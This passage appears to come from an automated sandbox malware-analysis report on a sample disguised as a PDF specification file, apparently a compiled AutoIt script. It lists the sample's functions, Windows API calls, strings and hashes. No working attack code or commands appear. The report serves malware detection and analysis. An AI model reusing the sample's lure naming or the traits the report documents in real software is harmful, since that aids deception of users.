                                      Function 0038D0B8 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0038D0D8
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0038D137
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0038D15C
                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0038D1EC
                                      • CloseHandle.KERNEL32(00000000), ref: 0038D1F7
                                      • RemoveDirectoryW.KERNEL32(?), ref: 0038D200
                                      • CloseHandle.KERNEL32(00000000), ref: 0038D20A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                      • String ID: :$\$\??\%s
                                      • API String ID: 3827137101-3457252023
                                      • Opcode ID: c29a72df4866b2cbe0bcd2b48e7f3abfa8bf2a94ab7c94962b3827da28a769a0
                                      • Instruction ID: 08d7ff3aceab59db7950d217cadac2e0f1cccbba81460fc2d327d4493d3b0300
                                      • Opcode Fuzzy Hash: c29a72df4866b2cbe0bcd2b48e7f3abfa8bf2a94ab7c94962b3827da28a769a0
                                      • Instruction Fuzzy Hash: 8831B476500209ABDB22EFA0DC49FEB77BDEF88740F1040B5F509D61A0E770E6448B24
                                      Function 003902EE Relevance: 16.8, APIs: 11, Instructions: 282comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0039034B
                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003903DE
                                      • SHGetDesktopFolder.SHELL32(?), ref: 003903F2
                                      • CoCreateInstance.OLE32(003CDA8C,00000000,00000001,003F3CF8,?), ref: 0039043E
                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003904AD
                                      • CoTaskMemFree.OLE32(?,?), ref: 00390505
                                      • SHBrowseForFolderW.SHELL32(?), ref: 0039057E
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003905A1
                                      • CoTaskMemFree.OLE32(00000000), ref: 003905A8
                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003905DF
                                      • CoUninitialize.OLE32(00000001,00000000), ref: 003905E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                      • String ID:
                                      • API String ID: 2762341140-0
                                      • Opcode ID: df8c7824f7c6f7b8598da2345ce21b24b774a6b0adab5c8af70a209b36a4f58e
                                      • Instruction ID: f72dcdaa8a45a9fa24cc5f4555f6eede39f270f6f0a4886688de0905a691017e
                                      • Opcode Fuzzy Hash: df8c7824f7c6f7b8598da2345ce21b24b774a6b0adab5c8af70a209b36a4f58e
                                      • Instruction Fuzzy Hash: E9B1D875A00209AFDB05DFA4C889DAEBBB9FF49304B1584A9F905EB251DB70EE41CF50
                                      Function 003794E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 003794FE
                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00379549
                                      • VariantInit.OLEAUT32(?), ref: 0037955B
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 0037957B
                                      • VariantCopy.OLEAUT32(?,?), ref: 003795BE
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 003795D2
                                      • VariantClear.OLEAUT32(?), ref: 003795E7
                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 003795F4
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003795FD
                                      • VariantClear.OLEAUT32(?), ref: 0037960F
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0037961A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                      • String ID:
                                      • API String ID: 2706829360-0
                                      • Opcode ID: 51b2281123476c38b7c52076589bf53c7b93a57dbb4bb1d5110406138640466a
                                      • Instruction ID: b338a3304f8b71b133b9f1c2ceb4d15b8eec425c4d374ff84724a7bad3bf2261
                                      • Opcode Fuzzy Hash: 51b2281123476c38b7c52076589bf53c7b93a57dbb4bb1d5110406138640466a
                                      • Instruction Fuzzy Hash: BA413231900219AFCB16EFA5D844DDEBB79FF08355F008165F505E7261DB35EA45CBA0
                                      Function 0034C833 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 479COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0035E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0034C8B7,?,00002000,?,?,00000000,?,0034419E,?,?,?,003DDC00), ref: 0035E984
                                        • Part of subcall function 0034660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003453B1,?,?,003461FF,?,00000000,00000001,00000000), ref: 0034662F
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0034C978
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0034CABE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$FullNamePath
                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                      • API String ID: 1801377286-1018226102
                                      • Opcode ID: 8aacbd06c980f1a33850b3cfaa88f43cc4a267cb352a0fed5efaf6b46124836b
                                      • Instruction ID: 2d3abcfc1a530c2cccd2077b6643a34c49ca3d99964cf7595693e0e1e50c7208
                                      • Opcode Fuzzy Hash: 8aacbd06c980f1a33850b3cfaa88f43cc4a267cb352a0fed5efaf6b46124836b
                                      • Instruction Fuzzy Hash: 461283715083419FC726EF24C841AAFBBE5FF99304F44492DF5899B261DB30EA49CB52
                                      Function 0039ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32 ref: 0039ADF6
                                      • CoUninitialize.OLE32 ref: 0039AE01
                                      • CoCreateInstance.OLE32(?,00000000,00000017,003CD8FC,?), ref: 0039AE61
                                      • IIDFromString.OLE32(?,?), ref: 0039AED4
                                      • VariantInit.OLEAUT32(?), ref: 0039AF6E
                                      • VariantClear.OLEAUT32(?), ref: 0039AFCF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                      • API String ID: 636576611-1287834457
                                      • Opcode ID: 0265543cc77406468d9eba598f45a234c4c53a59eb37d2e0c49ebf756876f6e7
                                      • Instruction ID: aae4e7ea496ac5973cc8621ceccf1e6811080026b674f2cad127ac2accde5473
                                      • Opcode Fuzzy Hash: 0265543cc77406468d9eba598f45a234c4c53a59eb37d2e0c49ebf756876f6e7
                                      • Instruction Fuzzy Hash: 5D618D71608B11AFDB12EF54C848B6BB7E8AF85714F104619F9869B291C770ED48CBD3
                                      Function 0038D76A Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 180COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerBuffW.USER32(003DDC00,003DDC00,003DDC00), ref: 0038D7CE
                                      • GetDriveTypeW.KERNEL32(?,003F3A70,00000061), ref: 0038D898
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BuffCharDriveLowerType
                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                      • API String ID: 2426244813-1000479233
                                      • Opcode ID: 9a6b329c9a36460f638d5eabe0b020b3cec59d4355bb6ab3f0a9e16b994daa62
                                      • Instruction ID: 8648b029220d2f3f86706916a2899ce7066e12882fc6b447143395b7ebeae0dd
                                      • Opcode Fuzzy Hash: 9a6b329c9a36460f638d5eabe0b020b3cec59d4355bb6ab3f0a9e16b994daa62
                                      • Instruction Fuzzy Hash: B35160351043049FC716FF14D891EAAB7A5EF85314F10896DF99A5B2E2DB31EE09CB42
                                      Function 00386CE9 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 178COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00386CFB
                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00386D21
                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00386D97
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: FileInfoVersion$QuerySizeValue
                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                      • API String ID: 2179348866-1459072770
                                      • Opcode ID: f27af5bf6fbc1a547af7ea38111fb139008f06cc74f33db42f682cc490936ed4
                                      • Instruction ID: aac4c53b636205987011da20e137577cd0431fc89b753d16b6fd2fc9ba18450b
                                      • Opcode Fuzzy Hash: f27af5bf6fbc1a547af7ea38111fb139008f06cc74f33db42f682cc490936ed4
                                      • Instruction Fuzzy Hash: 14410572600204BBEB13BB64CD43EBF77BCDF41310F04406AF901EA192EB74AA0497A1
                                      Function 00398107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WSAStartup.WSOCK32(00000101,?), ref: 00398168
                                      • inet_addr.WSOCK32(?,?,?), ref: 003981AD
                                      • gethostbyname.WSOCK32(?), ref: 003981B9
                                      • IcmpCreateFile.IPHLPAPI ref: 003981C7
                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00398237
                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0039824D
                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003982C2
                                      • WSACleanup.WSOCK32 ref: 003982C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                      • String ID: Ping
                                      • API String ID: 1028309954-2246546115
                                      • Opcode ID: 75552721561b5fe304bf5d3300647f5fac84e690563338a62837a281ab8e7be9
                                      • Instruction ID: 4f8072622970bd81512a563cc2a5eb9cceadf3111dc63f91a242b99c16ba6b79
                                      • Opcode Fuzzy Hash: 75552721561b5fe304bf5d3300647f5fac84e690563338a62837a281ab8e7be9
                                      • Instruction Fuzzy Hash: A151A3316047009FDB12AF24CC45F2AB7E8EF89710F044969FA96DB2A1DB70ED05CB41
                                      Function 003867E9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00386834
                                      • LoadResource.KERNEL32(?,00000000), ref: 00386840
                                      • LockResource.KERNEL32(00000000), ref: 0038684D
                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 0038686D
                                      • LoadResource.KERNEL32(?,00000000), ref: 0038687F
                                      • SizeofResource.KERNEL32(?,00000000), ref: 0038688E
                                      • LockResource.KERNEL32(?), ref: 0038689A
                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 003868F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Resource$FindLoadLock$CreateFromIconSizeof
                                      • String ID: 5?
                                      • API String ID: 2263570339-4033248023
                                      • Opcode ID: 2213efa76d9335e8ac4805583876b3681709d39251a2085326b969de9fa6dd4a
                                      • Instruction ID: 51a8e0c9e1e1376f81e49eb8a556e714b21f0e68bfef4f14879ff4762fefac8b
                                      • Opcode Fuzzy Hash: 2213efa76d9335e8ac4805583876b3681709d39251a2085326b969de9fa6dd4a
                                      • Instruction Fuzzy Hash: 313170B190021AABDB12AF60DD46EBFBBACEF08340F008865F906E6150E734E951DB64
                                      Function 0038E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0038E396
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0038E40C
                                      • GetLastError.KERNEL32 ref: 0038E416
                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0038E483
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Error$Mode$DiskFreeLastSpace
                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                      • API String ID: 4194297153-14809454
                                      • Opcode ID: a4cc1cd035be7ac2b4d66974f9969bf6e6536db0fa926171ae642cd3743650dc
                                      • Instruction ID: 3072312b8407c5aeda912145b0dd692ef36f72ae936478513b600388d63a3cd0
                                      • Opcode Fuzzy Hash: a4cc1cd035be7ac2b4d66974f9969bf6e6536db0fa926171ae642cd3743650dc
                                      • Instruction Fuzzy Hash: A7316135A003099FDB03EF65C845EBEB7B8EF45304F1580A5F60AEB291DB70AA01C791
                                      Function 0037B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0037B98C
                                      • GetDlgCtrlID.USER32 ref: 0037B997
                                      • GetParent.USER32 ref: 0037B9B3
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0037B9B6
                                      • GetDlgCtrlID.USER32(?), ref: 0037B9BF
                                      • GetParent.USER32(?), ref: 0037B9DB
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0037B9DE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$CtrlParent
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1383977212-1403004172
                                      • Opcode ID: 4b9d29d69c9df2be7b5237759b0b1ca4fb98d755919aa7ffac24673b4296e1fa
                                      • Instruction ID: 03e37f6629e0373f45f9e0a1007a6e04792714ff8ac0730121dd480ca243beef
                                      • Opcode Fuzzy Hash: 4b9d29d69c9df2be7b5237759b0b1ca4fb98d755919aa7ffac24673b4296e1fa
                                      • Instruction Fuzzy Hash: A721B675900108BFDF06ABA4CC85EFEBBB9EF46310F504119F665972E1DB786825DB20
                                      Function 0037B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0037BA73
                                      • GetDlgCtrlID.USER32 ref: 0037BA7E
                                      • GetParent.USER32 ref: 0037BA9A
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0037BA9D
                                      • GetDlgCtrlID.USER32(?), ref: 0037BAA6
                                      • GetParent.USER32(?), ref: 0037BAC2
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0037BAC5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$CtrlParent
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1383977212-1403004172
                                      • Opcode ID: 31256d9169739137f32a2e54d2b82be0ea53bca2e3db556085af6ae6fad85d28
                                      • Instruction ID: 2fb1f237e8cc8a8156d48e39e6f6677acb3b4b071bbbd4440fa7bfd37e31caf7
                                      • Opcode Fuzzy Hash: 31256d9169739137f32a2e54d2b82be0ea53bca2e3db556085af6ae6fad85d28
                                      • Instruction Fuzzy Hash: 5921C574900108BFDF52AB64CC85FFEBBB9EF45300F504015F955AB1A1DB796926DB20
                                      Function 0039B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0039B2D5
                                      • CoInitialize.OLE32(00000000), ref: 0039B302
                                      • CoUninitialize.OLE32 ref: 0039B30C
                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 0039B40C
                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 0039B539
                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0039B56D
                                      • CoGetObject.OLE32(?,00000000,003CD91C,?), ref: 0039B590
                                      • SetErrorMode.KERNEL32(00000000), ref: 0039B5A3
                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0039B623
                                      • VariantClear.OLEAUT32(003CD91C), ref: 0039B633
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                      • String ID:
                                      • API String ID: 2395222682-0
                                      • Opcode ID: e37a87ea73b5d0f0cbea53ce83e804b6fc5b2b85e8a8a608f067330beb236986
                                      • Instruction ID: b872604f87b7b68e653e62c3ff72bc808b18b3cd22d5c024c06f37fcdc284613
                                      • Opcode Fuzzy Hash: e37a87ea73b5d0f0cbea53ce83e804b6fc5b2b85e8a8a608f067330beb236986
                                      • Instruction Fuzzy Hash: A6C12271608301AFCB02DF69D984A2BB7E9BF89308F00491DF98ADB251DB71ED05CB52
                                      Function 00384DDD Relevance: 15.2, APIs: 10, Instructions: 189windowsleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemInfoW.USER32(00401708,000000FF,00000000,00000030), ref: 00384E59
                                      • SetMenuItemInfoW.USER32(00401708,00000004,00000000,00000030), ref: 00384E8F
                                      • Sleep.KERNEL32(000001F4), ref: 00384EA1
                                      • GetMenuItemCount.USER32(?), ref: 00384EE5
                                      • GetMenuItemID.USER32(?,00000000), ref: 00384F01
                                      • GetMenuItemID.USER32(?,-00000001), ref: 00384F2B
                                      • GetMenuItemID.USER32(?,?), ref: 00384F70
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00384FB6
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00384FCA
                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00384FEB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
